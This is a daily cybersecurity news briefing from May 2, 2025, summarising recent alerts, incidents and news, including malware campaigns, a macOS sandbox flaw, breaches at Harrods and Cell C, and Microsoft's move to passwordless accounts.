May 2, 2025 – Cyber Briefing

👉 What are the latest cybersecurity alerts, incidents, and news?

FBI, Scammers, Self Service Websites, Apple, macOS, Security Flaw, Sandbox, PyPI, Gmail SMTP, Malware, Exfiltrate Data, MintsLoader, GhostWeaver, Phishing, ClickFix, LummaStealer, FakeCAPTCHA, Harrods, Cyberattack, Internet Access, Germany, Stuttgart, Website, Cyberattack, Oklahoma, Bartlesville Public Schools, Cyberattack, State Testing, Netherlands, Corendon, Arriva, DDoS Attack, Russian Hackers, South Africa, Cell C, RansomHouse, Apple, Spyware, UK, Canada, Data Protection, 23andMe, Bankruptcy, Ukrainian Extradited, Nefilim Ransomware, Raytheon, Nightwing, Fine, Cybersecurity Failures, Microsoft, Passwordless Accounts , Security.

Listen to the full podcast

🚨 Cyber Alerts

1. Scammers Are Targeting Self Service Sites

The FBI has issued a warning about a growing scam targeting users of employee self-service websites. Cyber criminals are using search engine ads to direct individuals to fake sites designed to capture sensitive information such as login credentials and financial details. The fraudsters have shifted their focus from small businesses to targeting payroll, unemployment programs, and health savings accounts, directly impacting individuals’ finances. Once the criminals gain access, they can carry out fraudulent activities, including wire transfers, redirecting paychecks, and using stolen identities for further crimes.

2. macOS Flaw Lets Hackers Bypass Sandbox

A critical vulnerability in macOS allows attackers to bypass the App Sandbox protection by exploiting security-scoped bookmarks. This flaw enables malicious actors to delete and replace keychain entries, which are essential for maintaining the system’s security boundaries. By crafting malicious bookmarks and injecting them into the system, attackers can bypass sandbox restrictions and access sensitive files without user consent. Apple has addressed the issue with security updates for affected systems and urges users to apply them promptly to mitigate potential risks.

3. PyPI Attack Uses Gmail to Exfiltrate Data

A sophisticated software supply chain attack exploited PyPI repositories to distribute seven malicious packages, amassing over 55,000 downloads. These packages used Google’s SMTP infrastructure to create a stealthy bidirectional tunnel for command-and-control, bypassing traditional security measures. Once deployed, the malware allowed attackers to remotely access internal APIs, dashboards, and admin panels, execute commands, and exfiltrate sensitive data.

4. MintsLoader Delivers GhostWeaver Malware

MintsLoader is a malware loader that delivers the GhostWeaver PowerShell trojan via phishing campaigns. It uses advanced evasion techniques such as sandbox detection, virtual machine evasion, and domain generation algorithms (DGA) to bypass security systems. Once deployed, GhostWeaver establishes persistent C2 communications, stealing browser data and delivering additional payloads. Social engineering tactics like ClickFix are also used to trick victims into executing malicious code, leading to further compromise.

5. LummaStealer Malware Uses FakeCAPTCHA Trick

LummaStealer malware has evolved to use FakeCAPTCHA as a social engineering tactic to harvest sensitive data. The malware primarily targets browser credentials, cryptocurrency wallets, and system information, posing a significant risk to both individual users and organizations. By manipulating users into executing malicious PowerShell scripts disguised as harmless files, it successfully bypasses conventional security measures. Security experts recommend heightened monitoring of PowerShell activity, mshta.exe behavior, and unusual external network connections to identify and prevent potential infections from this evolving threat.

💥 Cyber Incidents

6. Harrods Cyberattack Limits Internet Access

Harrods, a luxury department store in London, recently faced a cyberattack attempt, leading to restricted internet access. Despite this, the store’s flagship location and online sales remained operational, and customers were advised to continue as normal. This attack comes shortly after similar incidents targeted Marks & Spencer and the Co-op in the UK, with M&S facing a significant ransomware attack. Experts warn that the frequency of these attacks highlights the growing vulnerability of retailers to cyber threats.

7. Stuttgart Website Down Due to Cyberattack

A cyberattack temporarily disrupted the Stuttgart city administration website in Germany, causing limited accessibility. The city took the site offline as a precaution on Tuesday evening, and it was restored by the afternoon. The attack, identified as a Distributed Denial of Service (DDoS) attack, flooded the site with excessive traffic, overwhelming its servers. Despite this, other city systems remained unaffected and continued to operate normally. The city administration is working diligently to secure the website and prevent similar attacks from impacting services in the future.

8. Bartlesville Schools Hit by Cyberattack

A cyberattack targeted Bartlesville Public Schools in Oklahoma, disabling much of the district’s computer network. As a result, the district had to cancel state testing and postpone it until the issue is resolved. While essential services like phones, life safety systems, and Chromebooks with hotspots continued to function, many systems were rendered inoperable. The district launched an investigation with external cybersecurity professionals, but no updates on sensitive data compromise or the length of the outage have been provided yet.

9. Russian Hackers Target Corendon and Arriva

Russian hacker group NoName targeted multiple Dutch companies, including Corendon, Arriva, AIS Airlines, and Allgobus, in a recent DDoS attack. The hackers, aligned with the Russian cause, issued a message blaming these companies for supporting Ukraine. Corendon’s website was temporarily offline due to the attack, affecting bookings, though check-ins and travel were unaffected. Arriva’s website also experienced disruption, with limited availability, and the company had anticipated the attack after observing a pattern targeting specific organizations.

10. Cell C Confirms Data Breach by RansomHouse

Cell C, South Africa’s fourth-largest mobile network operator, confirmed a cyberattack on its systems in November 2024. The hacker group RansomHouse claimed responsibility for the breach, disclosing 2TB of sensitive data, which included full names, contact details, banking information, medical records, and more. Although the exact number of affected individuals remains unclear, the company emphasized the potential risks of identity theft and fraud. Since discovering the attack, Cell C has worked with international cybersecurity experts to mitigate the damage.

📢 Cyber News

11. Apple Alerts Users Worldwide of Spyware

Apple notified users in 100 countries this week, warning them that their phones were targeted by advanced commercial spyware. Among those who received notifications were Italian journalist Cyrus Pellegrino and Dutch activist Eva Vlaardingerbroek, both of whom acknowledged the attack. The spyware’s origins are unclear, but Pellegrino suspects it is linked to a previous wave of Paragon attacks reported in January. Apple’s notifications highlight the severity of mercenary spyware, which can give attackers full access to victims’ devices without their knowledge or consent.

12. UK and Canada Demand Data Protection

As 23andMe undergoes bankruptcy proceedings, UK and Canadian regulators have raised alarms over customer data. On May 1, 2025, the UK’s Information Commissioner’s Office and Office of the Privacy Commissioner of Canada jointly called for the protection of sensitive personal information during and after the sale process. They warned potential buyers that failure to comply with data protection laws such as GDPR and PIPEDA could result in enforcement actions. The joint letter comes after the company faced significant scrutiny following a 2023 data breach that impacted millions.

13. Ukrainian Extradited to US Over Cyberattacks

A Ukrainian national, Artem Stryzhak, was extradited from Spain to the United States on April 30, 2025, to face charges related to his involvement in Nefilim ransomware attacks. The U.S. Department of Justice states that Stryzhak, 35, became an affiliate of the Nefilim group in 2021 and participated in attacks targeting high-revenue companies in countries including the U.S., Norway, France, and Germany. These attacks involved breaching corporate networks, stealing sensitive data, and demanding ransom payments in Bitcoin, with threats of leaking the stolen data if victims refused to pay.

14. Raytheon and Nightwing to Pay $8.4 Million

Raytheon and Nightwing Group have agreed to pay a combined $8.4 million to settle allegations of cybersecurity failures. Between 2015 and 2021, Raytheon’s CODEX division used a non-compliant network to handle non-classified defense information. This violation of federal cybersecurity standards led to the settlement, although Raytheon did not admit fault. The case, brought under the False Claims Act, highlights the increasing focus on holding defense contractors accountable for ensuring robust cybersecurity protections in line with government standards.

15. Microsoft Switches to Passwordless Accounts

Microsoft has made a significant shift in its security strategy by announcing that all new accounts will be passwordless by default. This change aims to enhance security by eliminating traditional password-related vulnerabilities, such as phishing and brute force attacks. Users will be prompted to use more secure alternatives like passkeys, which rely on biometric authentication methods, such as fingerprints or facial recognition. The company has already begun rolling out these updates in March, with a user experience designed to prioritize passkey-first authentication, offering a more streamlined and secure login process.